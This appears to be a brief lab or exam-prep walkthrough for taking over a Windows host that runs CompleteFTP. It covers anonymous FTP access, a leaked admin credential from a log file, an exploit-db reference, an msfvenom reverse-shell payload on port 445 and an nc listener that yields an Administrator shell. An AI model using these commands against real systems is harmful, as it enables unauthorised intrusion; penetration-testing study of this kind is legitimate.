You are on page 1of 2

.

87 ( by Discord: 0xhexf:6615)
----------------------------------------

Scan all ports

Login to anonymousFTP

Downalod all files

Search password in files


path
C:\Program Files (x86)\Complete FTP\Server\Bootstrapper.log

2020-01-06 09:05:51,600 INFO ConfigBuilder Launching C:\Program Files (x86)\Complete FTP\


Manager\CompleteFTPManager.exe localhost 14983 "admin"
roEDm7ZYh9FV2ja/9NdECkG+atC9BDLeiY+4cxtNfOTqdy4YEh3MlGZDjvpEexjb SFTP

Here is the exploit:

https://www.exploit-db.com/exploits/48657

Generate reverse shell with MSFvenom - backdoor.exe ( lport must be 445 )

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.X.X LPORT=445 EXITFUNC=thread -f c -


a x86 -o backdoor.exe
Create python server and download backdoor.exe to .87 machine using exploit

Run exploit as shown in photo

Listen on your machine

nc -nvlp 445

You will get Administrator shell

You might also like